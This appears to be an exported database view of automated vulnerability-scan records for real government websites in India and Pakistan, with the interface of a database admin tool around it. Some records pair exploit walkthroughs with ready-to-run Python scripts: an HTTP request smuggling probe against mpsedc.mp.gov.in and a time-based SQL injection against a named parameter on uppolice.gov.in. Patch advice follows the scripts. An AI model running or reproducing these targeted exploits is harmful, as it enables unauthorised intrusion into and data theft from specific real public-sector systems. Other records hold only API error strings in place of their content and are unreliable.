https://pro.anveshaktool.in/assets/alert-dialog.DAemOyMw.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/card.W5-5lXb_.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-icons.DFKk2K-V.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-maps.CgbOPjNH.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-pdf.CsNv1Okx.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-socketio.XvGWOZWK.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-time.zp-6qPUz.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/index.DC99iDk-.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/label.DHuWt8iL.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/vendor-react.Che5oQJX.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/vendor.B6Uj8dBk.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/cdn-cgi/rum\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/contact\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/docs\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/faq\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/favicon.ico\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/forgot-password\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/login\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/openapi.json\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/privacy\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/signup\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/status\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/terms\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-maps.Dgihpmma.css\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/assets/index.BpD8wi1l.css\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/assets/vendor-react.Be32Wa2T.css\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/cdn-cgi/challenge-platform/scripts/jsd/main.js\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/favicon.svg" } ]
69fae73238ce188953537418	https://mpsedc.mp.gov.in/	2026-05-06T07:01:06.261337+00:00	[ { "vulnerability": "HTTP request smuggling", "category": "miscellaneous", "exploit_steps": "## HTTP Request Smuggling Exploitation Walkthrough\\n\\n### 1. Reconnaissance\\n- Identified endpoint: `https://mpsedc.mp.gov.in/SimhasthaTechHackathon.html`\\n- Observed that the server accepts both `Content-Length` and `Transfer-Encoding: chunked` headers in the same request, indicating potential inconsistency in HTTP parsing between frontend and backend proxies.\\n\\n### 2. Vulnerability Confirmation\\n- Sent a malformed POST request containing both `Content-Length` and `Transfer-Encoding: chunked` headers.\\n- The presence of these conflicting headers without proper normalization by the frontend indicates a possible desynchronization vulnerability.\\n\\n### 3. Exploitation Steps\\n1. Craft Malformed Request: Construct an HTTP request with both `Content-Length` and `Transfer-Encoding: chunked` headers.\\n2. Send Ambiguous Payload: Transmit the crafted request to observe inconsistent interpretation by chained servers.\\n3. Analyze Response Behavior: Monitor responses for signs of request smuggling such as delayed processing or unexpected content inclusion.\\n\\n### 4. Impact\\n- Potential for bypassing security controls, session fixation, or cache poisoning depending on how downstream components handle the ambiguous request.", "exploit_code": "import requests\n\n# Target URL from scan data\nurl = \"https://mpsedc.mp.gov.in/SimhasthaTechHackathon.html\"\n\n# Malformed request body simulating smuggling attempt\nmalformed_body = (\"POST /SimhasthaTechHackathon.html?Jb1v=773187510 HTTP/1.1\\r\\n\"\n \"Host: mpsedc.mp.gov.in\\r\\n\"\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n \"Transfer-Encoding: chunked\\r\\n\"\n \"Content-Length: 25\\r\\n\\r\\n\"\n \"f\\r\\n\"\n \"oblez=x&miwvw=x\\r\\n\"\n \"0\\r\\n\\r\\n\")\n\ntry:\n # Sending raw bytes via socket would be ideal, but using requests here shows behavior\n response = requests.post(url, data=\"oblez=x&miwvw=x\", headers={\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Transfer-Encoding': 'chunked',\n 'Content-Length': '25'\n }, timeout=10)\n print(f\"Status Code: {response.status_code}\")\n print(f\"Response Body Length: {len(response.content)}\")\nexcept Exception as e:\n print(f\"Request failed: {str(e)}\")", "patch_code": "## Root Cause\\nThe vulnerability arises due to inconsistent handling of HTTP requests between frontend and backend servers when both `Content-Length` and `Transfer-Encoding: chunked` headers are present. This allows attackers to smuggle requests through proxy layers.\\n\\n## Before/After Fix\\nBefore:\\nFrontend allowed ambiguous HTTP headers leading to inconsistent parsing.\\n```http\\nPOST /path HTTP/1.1\\nTransfer-Encoding: chunked\\nContent-Length: 25\\n\\n[body]\\n```\\n\\nAfter:\\nConfigure frontend server to normalize ambiguous requests before forwarding:\\n- Use only one method (`Content-Length` OR `Transfer-Encoding`) per request.\\n- Reject or sanitize conflicting header combinations at ingress.\\n\\nExample Nginx config:\\n```nginx\\nserver {\\n listen 80;\\n location / {\\n proxy_pass http://backend;\\n proxy_set_header Connection '';\\n proxy_http_version 1.1;\\n proxy_hide_header Transfer-Encoding;\\n }\\n}\\n```\\n\\n## Defense-in-Depth Checklist\\n- [ ] Ensure consistent HTTP parser configurations across all proxies and backends\\n- [ ] Disable reuse of backend connections where feasible\\n- [ ] Enforce strict HTTP compliance at network boundaries\\n- [ ] Implement WAF rules to detect conflicting headers\\n- [ ] Regularly audit traffic logs for abnormal patterns\\n\\n## Verification Steps\\n1. Send test requests with conflicting `Content-Length` and `Transfer-Encoding` headers\\n2. Confirm that server either normalizes or rejects such requests\\n3. Validate that no unintended request concatenation occurs\\n4. Review access logs for dropped or sanitized malicious patterns", "context": "Severity: Medium (Tentative)\nURL: https://mpsedc.mp.gov.in/SimhasthaTechHackathon.html\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://mpsedc.mp.gov.in/robots.txt" } ]
6a12865432de6bb6782baab3	https://uppolice.gov.in/	2026-05-24T05:02:12.394911+00:00	[ { "vulnerability": "SQL injection", "category": "injection", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://uppolice.gov.in/frmTendermanagement.aspx`\n2. Observed the presence of the `cd` parameter in the URL query string.\n3. Noted that the value of `cd` is base64-encoded (`MQAwADAAMQA%3d` decodes to `1001`).\n\n## Vulnerability Confirmation\n1. Injected a single quote `'` into the `cd` parameter by modifying the URL to `/frmTendermanagement.aspx?ghazipur&cd='`\n2. Observed that the application returned a generic database error message.\n3. Injected two single quotes `''` into the `cd` parameter.\n4. Confirmed that the error disappeared, indicating that the input is directly embedded into an SQL query without proper sanitization.\n\n## Exploitation Steps\n1. Craft a malicious payload designed to manipulate the SQL query structure.\n2. Use time-based SQL injection to infer database information, since error messages may not disclose details.\n3. Submit the payload via a GET request to the vulnerable endpoint.\n4. Monitor response timing to confirm successful exploitation.\n\n## Impact\nSuccessful exploitation allows an attacker to:\n- Extract sensitive data from the database.\n- Potentially escalate privileges and take control of the database server.\n- Bypass authentication or manipulate application logic.", "exploit_code": "import requests\nimport time\n\n# Target configuration\nurl = \"https://uppolice.gov.in/frmTendermanagement.aspx\"\nparam_name = \"cd\"\nbase_value = \"MQAwADAAMQA=\" # Base64 encoded '1001'\n\n# Time-based SQL injection payload (example for MySQL)\npayload = \"'; SELECT SLEEP(5); --+\"\nencoded_payload = requests.utils.quote(payload)\nfull_url = f\"{url}?ghazipur&{param_name}={encoded_payload}\"\n\nprint(f\"Sending request to: {full_url}\")\nstart_time = time.time()\nresponse = requests.get(full_url, verify=False)\nend_time = time.time()\n\nelapsed_time = end_time - start_time\nprint(f\"Response received in {elapsed_time:.2f} seconds\")\n\nif elapsed_time >= 5:\n print(\"[+] Possible SQL Injection detected via time delay.\")\nelse:\n print(\"[-] No significant delay observed.\")", "patch_code": "## Root Cause\nThe application incorporates user-supplied data from the `cd` parameter directly into an SQL query without proper sanitization or parameterization. This allows attackers to alter the query's logic by injecting malicious SQL syntax.\n\n## Before/After Code Fix\nBefore (Vulnerable):\n```csharp\nstring query = \"SELECT * FROM tenders WHERE id = \" + Request.QueryString[\"cd\"];\nSqlCommand cmd = new SqlCommand(query, connection);\n```\n\nAfter (Secure - Using Parameterized Query):\n```csharp\nstring query = \"SELECT * FROM tenders WHERE id = @cd\";\nSqlCommand cmd = new SqlCommand(query, connection);\ncmd.Parameters.AddWithValue(\"@cd\", Request.QueryString[\"cd\"]);\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict input validation on all parameters.\n- [ ] Apply Web Application Firewall (WAF) rules to detect SQL injection attempts.\n- [ ] Regularly audit database permissions and reduce privileges where possible.\n- [ ] Implement secure coding practices training for developers.\n- [ ] Conduct periodic penetration testing and code reviews.\n\n## Verification Steps\n1. Resend the original test payloads (`'` and `''`) to the `cd` parameter.\n2. Confirm that no database errors are returned.\n3. Validate that application functionality remains intact after applying fixes.\n4. Perform regression tests to ensure no unintended side effects.", "context": "Severity: High (Tentative)" } ]
6a1586b5ae36b72c92a08d4d	https://ep.gov.pk/	2026-05-26T11:40:37.522652+00:00	[ { "vulnerability": "SQL injection", "category": "injection", "exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.", "exploit_code": "", "patch_code": "", "context": "Severity: High (Firm)\nURL: https://ep.gov.pk/tariff/emsp_tariff.aspx [Type parameter]\n\n---\n\nSeverity: High (Firm)\nURL: https://ep.gov.pk/tariff/emsp_tariff.aspx [Zone parameter]" }, { "vulnerability": "File path traversal", "category": "path_traversal", "exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.", "exploit_code": "", "patch_code": "", "context": "Severity: High (Firm)" }, { "vulnerability": "File path manipulation", "category": "miscellaneous", "exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.", "exploit_code": "", "patch_code": "", "context": "Severity: High (Certain)" }, { "vulnerability": "Cross-site scripting (reflected)", "category": "xss", "exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.", "exploit_code": "", "patch_code": "", "context": "Severity: High (Firm)\nURL: https://ep.gov.pk/tariff/emsp_tariff.aspx [Country_Name parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://ep.gov.pk/track.asp [textfieldz parameter]" } ]

Rename Collection

Tools

Export Standard

Export --jsonArray

Import --mongoexport json

Collection Stats

Documents	10
Total doc size	106.2 KB
Average doc size	10.62 KB
Pre-allocated size	152 KB
Indexes	1
Total index size	36 KB
Padding factor
Extents

Indexes

Name	Columns	Size	Attributes	Actions
_id_	_id ASC	36 KB		DEL